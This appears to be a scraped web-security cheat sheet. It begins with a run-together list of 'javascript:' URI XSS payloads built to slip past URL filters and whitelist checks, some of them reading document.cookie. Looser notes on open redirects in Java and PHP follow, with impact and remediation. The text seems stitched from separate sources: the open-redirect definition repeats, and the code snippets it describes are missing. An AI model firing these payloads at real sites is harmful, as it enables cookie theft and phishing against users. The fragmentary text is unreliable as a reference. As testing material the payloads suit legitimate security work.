#Basic payload, javascript code is executed after "javascript:"javascript:alert(1)#Bypass "javascript" word filter with CRLFjava%0d%0ascript%0d%0a:alert(0)#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed#This bypasses FILTER_VALIDATE_URL os PHPjavascript://%250Aalert(1)#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)javascript://%250Aalert(1)//?1javascript://%250A1?alert(1):0#Others%09Jav%09ascript:alert(document.domain)javascript://%250Alert(document.location=document.cookie)/%09/javascript:alert(1);/%09/javascript:alert(1)//%5cjavascript:alert(1);//%5cjavascript:alert(1)/%5cjavascript:alert(1);/%5cjavascript:alert(1)javascript://%0aalert(1)<>javascript:alert(1);//javascript:alert(1);//javascript:alert(1)/javascript:alert(1);/javascript:alert(1)\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)javascript:alert(1);javascript:alert(1)javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)javascript:confirm(1)javascript://https://whitelisted.com/?z=%0Aalert(1)javascript:prompt(1)jaVAscript://whitelisted.com//%0d%0aalert(1);//javascript://whitelisted.com?%a0alert%281%29/x:1/:///%01javascript:alert(document.cookie)/";alert(0);//
An open redirect vulnerability exists when a web application allows a user to redirect to an external site by manipulating the URL. This can be exploited by an attacker to redirect users to malicious websites to perform phishing attacks or distribute malware. To identify open redirect vulnerabilities, testers can manipulate parameters commonly used for redirection, such as:
url
link
next
target
By injecting malicious URLs into these parameters, testers can determine if the application is vulnerable to open redirects.
An open redirect occurs when a web application redirects to a user-supplied link without proper validation. Attackers can abuse this vulnerability to redirect users to malicious websites, phishing pages, or other harmful content.
Example
Consider the following vulnerable Java code snippet:
In this example, the web application blindly redirects users to the URL specified in the redirect parameter without any validation. An attacker can craft a malicious link like http://vulnerable-website.com/?redirect=http://malicious-website.com to redirect users to a harmful website.
Prevention
To prevent open redirect vulnerabilities in Java web applications, always validate and sanitize user-supplied input before using it to redirect users. Whitelist allowed URLs or domains and ensure that the redirect URL belongs to the expected domain.
response.redirect("http://mysafedomain.com");
PHP
Open Redirect
An open redirect vulnerability exists when a web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect. This can be abused by an attacker to craft a malicious link that redirects users to a phishing page or a malware download.
In this code, the script takes a URL from the url parameter in the query string and redirects the user to that URL using the header() function. An attacker can exploit this by crafting a link like http://example.com/redirect.php?url=http://malicious-site.com.
Impact
The impact of an open redirect vulnerability includes phishing attacks, malware distribution, and social engineering attacks. It can be used in combination with other vulnerabilities to further compromise the security of a web application.
Remediation
To prevent open redirect vulnerabilities, always validate and sanitize user input before using it in a redirect. Whitelist allowed domains or use a safe redirect method that does not rely on user-controlled input.